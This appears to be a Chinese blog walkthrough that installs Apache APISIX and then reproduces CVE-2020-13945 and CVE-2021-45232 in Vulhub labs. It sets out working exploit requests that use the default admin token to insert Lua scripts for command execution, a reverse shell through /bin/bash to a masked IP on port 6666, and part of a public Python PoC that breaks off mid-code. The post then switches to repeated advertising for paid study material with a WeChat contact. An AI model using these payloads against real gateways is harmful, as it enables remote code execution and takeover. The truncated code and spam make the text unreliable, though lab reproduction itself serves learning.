| — | — | — |
| Apache APISIX | 9080 | edd1c9f034335f136f87ad84b625c8f1 |
| Apache APISIX Dashboard | 9000 | admin/admin |
官方推荐的快速安装 APISIX:
curl -sL https://run.api7.ai/apisix/quickstart | sh
验证安装是否成功
curl “http://127.0.0.1:9080” --head | grep Server
【创建路由】
通过下面的命令,你将创建一个路由,把请求 http://127.0.0.1:9080/ip 转发至 httpbin.org/ip:
root@ubuntu:~/Desktop$ curl -i “http://127.0.0.1:9180/apisix/admin/routes” -X PUT -d ’
{
“id”: “getting-started-ip”,
“uri”: “/ip”,
“upstream”: {
“type”: “roundrobin”,
“nodes”: {
“httpbin.org:80”: 1
}
}
}’
HTTP/1.1 201 Created
Date: Sun, 18 Feb 2024 01:45:48 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Server: APISIX/3.8.0
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: *
Access-Control-Max-Age: 3600
X-API-VERSION: v3
{“key”:“/apisix/routes/getting-started-ip”,“value”:{“upstream”:{“scheme”:“http”,“nodes”:{“httpbin.org:80”:1},“type”:“roundrobin”,“pass_host”:“pass”,“hash_on”:“vars”},“id”:“getting-started-ip”,“priority”:0,“update_time”:1708220748,“uri”:“/ip”,“status”:1,“create_time”:1708220748}}
root@ubuntu:~/Desktop$
root@ubuntu:~/Desktop$ curl “http://127.0.0.1:9080/ip”
{
“origin”: “XXX.XXX.XXX.21”
}
root@ubuntu:~/Desktop$
【部署 APISIX Dashboard】
Apache APISIX Dashboard 是基于浏览器的可视化平台,用于监控、管理 Apache APISIX。官方项目地址:https://github.com/apache/apisix-dashboard。
docker pull apache/apisix-dashboard
docker run -d --name dashboard
-p 9000:9000
-v <CONFIG_FILE>:/usr/local/apisix-dashboard/conf/conf.yaml
apache/apisix-dashboard
此处安装失败,原因不详,从 docker 日志看是由于错误无法连接 2379 的 etcd 服务。
CVE-2020-13945默认api令牌
Apache APISIX 是一个高性能 API 网关。在用户未指定管理员 Token 或使用了默认配置文件的情况下,Apache APISIX 将使用默认的管理员 Token:edd1c9f034335f136f87ad84b625c8f1,攻击者利用这个 Token 可以访问到管理员接口,进而通过 script 参数来插入任意 LUA 脚本并执行。
该默认令牌配置文件位于:https://github.com/apache/apisix/blob/master/conf/config.yaml, 这是一个默认配置导致的安全问题,实际上从官方文档也可以看出官方并不会修复该 CVE 漏洞,而是给出了安全提醒:
【环境搭建】
基于 Vulhub 快速搭建靶场环境(https://vulhub.org/#/environments/apisix/CVE-2020-13945/):
环境启动后,访问 http://your-ip:9080 即可查看到默认的 404 页面。
【漏洞复现】
利用默认 Token 增加一个恶意的 router( 该 API 接口详细参数请参见官方文档:Admin API | Apache APISIX),其中包含恶意 LUA 脚本:
POST /apisix/admin/routes HTTP/1.1
Host: your-ip:9080
Accept-Encoding: gzip, deflate
Accept: /
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
X-API-KEY: edd1c9f034335f136f87ad84b625c8f1
Content-Type: application/json
Content-Length: 406
{
“uri”: “/attack”,
“script”: “local _M = {} \n function _M.access(conf, ctx) \n local os = require(‘os’)\n local args = assert(ngx.req.get_uri_args()) \n local f = assert(io.popen(args.cmd, ‘r’))\n local s = assert(f:read(‘*a’))\n ngx.say(s)\n f:close() \n end \nreturn _M”,
“upstream”: {
“type”: “roundrobin”,
“nodes”: {
“example.com:80”: 1
}
}
}
然后,我们访问刚才添加的 router,就可以通过 cmd 参数执行任意命令:http://your-ip:9080/attack?cmd=id
【其他管理接口】
Admin API (https://apisix.apache.org/zh/docs/apisix/admin-api)是一组用于配置 Apache APISIX 路由、上游、服务、SSL 证书等功能的 RESTful API。你可以通过 Admin API 来获取、创建、更新以及删除资源。同时得益于 APISIX 的热加载能力,资源配置完成后 APISIX 将会自动更新配置,无需重启服务。
以“获取资源列表”的接口 /apisix/admin/consumers 为例:
CVE-2021-45232未授权接口
Apache APISIX Dashboard 是基于浏览器的可视化平台,用于监控、管理 Apache APISIX。Apache APISIX Dashboard 2.10.1 版本前存在两个 API:/apisix/admin/migrate/export 和 /apisix/admin/migrate/import,它们没有经过 droplet 框架的权限验证,导致未授权的攻击者可以导出、导入当前网关的所有配置项,包括路由、服务、脚本等。攻击者通过导入恶意路由,可以用来让 Apache APISIX 访问任意网站,甚至执行 LUA 脚本。
继续使用 Vulhub 一键搭建靶场环境:
然后访问 http://your-ip:9000/ 即可看到 Apache APISIX Dashboard 的登录页面:
2.1 默认账户密码导致RCE
官方默认登录账户密码 admin/admin(Vulhub 镜像的密码为 vulhub):
其实实战中如果没有敏感接口的未授权访问漏洞的话,是可以通过弱密码登录后台进行 RCE 的,接下来先看看进入后台后如何完成 RCE。
1、 先创建任意名称的上游服务,请注意目标节点信息后面触发 RCE 会用到:
2、 接着创建路由,把选择上游服务选择为上面的创造的上游:
3、访问上述创建的路由,通过“查看”修改配置,添加反弹 Shell 的 Lua Script:
提交修改请求(API 接口参数释义请参见:https://apisix.apache.org/zh/docs/apisix/admin-api/#route),数据包如下:
PUT /apisix/admin/routes/501155186035655361 HTTP/1.1
Host: XXX.XXX.XXX.16:9000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: application/json
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Referer: http://XXX.XXX.XXX.16:9000/routes/list
Content-Type: application/json;charset=UTF-8
Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MDgyNDMyNjIsImlhdCI6MTcwODIzOTY2Miwic3ViIjoiYWRtaW4ifQ.BkV5VDZkMubP56Uutpn0CXQwx2oJUumjH7HgpvlpBdo
Content-Length: 227
Origin: http://XXX.XXX.XXX.16:9000
Connection: close
{“uri”:“/*”,“name”:“rce”,“methods”:[“GET”,“POST”,“PUT”,“DELETE”,“PATCH”,“HEAD”,“OPTIONS”,“CONNECT”,“TRACE”],“script”:“os.execute(‘/bin/bash -i >& /dev/tcp/XXX.XXX.XXX.50/6666 0>&1’)”,“upstream_id”:“501154557745693377”,“status”:1}
4、接着访问:http://127.0.0.1:9080/rce,即可触发命令执行实现 RCE:
【More】创建路由时并非强制选择上游服务,故上述创建上游服务的步骤也可以直接忽略,直接创建路由并指定一个有效的目标节点(主机名+有效业务端口)接口,比如:
2.2 未授权访问api接口RCE
此漏洞的鉴权缺陷源码分析可参见:https://xz.aliyun.com/t/10732。
那如果没有默认密码或者弱密码的话,这时我们就利用未授权接口进行 RCE 了。这里我们需要知道这两个接口一个是用来导出配置文件,一个是用来导入配置文件的。
我们可以使用 /apisix/admin/migrate/export 直接导出配置文件,删除 Authorization 字段后发现是可以正常未授权访问的:
接下来利用另一个接口导入恶意配置即可实现 RCE,但是从上面导出的配置数据可以看到,后面多出四个字节,这 4 个字节其实是配置文件的 checksum 值,在导入配置文件时,也会对配置文件的 checksum 值进行校验,那这里需要阅读 APISIX 源码并编写脚本算出 checksum 校验值。
简单起见,直接利用 Github 现成的 POC 验证程序即可:https://github.com/wuppp/cve-2021-45232-exp/blob/main/apisix_dashboard_rce.py
#!/usr/bin/env python3
import zlib
import json
import random
import requests
import string
import sys
from urllib3.exceptions import InsecureRequestWarning
Suppress only the single warning from urllib3 needed.
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
eval_config = {
“Counsumers”: [],
“Routes”: [
{
“id”: str(random.randint(100000000000000000, 1000000000000000000)),
“create_time”: 1640674554,
“update_time”: 1640677637,
“uris”: [
“/rce”
],
“name”: “rce”,
“methods”: [
“GET”,
“POST”,
“PUT”,
“DELETE”,
“PATCH”,
“HEAD”,
“OPTIONS”,
“CONNECT”,
“TRACE”
],
“script”: “local file = io.popen(ngx.req.get_headers()[‘cmd’],‘r’) \n local output = file:read(‘*all’) \n file:close() \n ngx.say(output)”,
“status”: 1
}
],
“Services”: [],
“SSLs”: [],
“Upstreams”: [],
“Scripts”: [],
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!
由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新
如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。
最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。
最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!下面就开始进入正题,如何从一个萌新一步一步进入网络安全行业。
学习路线图
其中最为瞩目也是最为基础的就是网络安全学习路线图,这里我给大家分享一份打磨了3个月,已经更新到4.0版本的网络安全学习路线图。
相比起繁琐的文字,还是生动的视频教程更加适合零基础的同学们学习,这里也是整理了一份与上述学习路线一一对应的网络安全视频教程。
网络安全工具箱
当然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份我自己整理的网络安全入门工具以及使用教程和实战。
项目实战
最后就是项目实战,这里带来的是SRC资料&HW资料,毕竟实战是检验真理的唯一标准嘛~
面试题
归根结底,我们的最终目的都是为了就业,所以这份结合了多位朋友的亲身经验打磨的面试题合集你绝对不能错过!
一个人可以走的很快,但一群人才能走的更远。如果你从事以下工作或对以下感兴趣,欢迎戳这里加入程序员的圈子,让我们一起学习成长!
AI人工智能、Android移动开发、AIGC大模型、C C#、Go语言、Java、Linux运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算
你绝对不能错过!
一个人可以走的很快,但一群人才能走的更远。如果你从事以下工作或对以下感兴趣,欢迎戳这里加入程序员的圈子,让我们一起学习成长!
AI人工智能、Android移动开发、AIGC大模型、C C#、Go语言、Java、Linux运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算
978
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
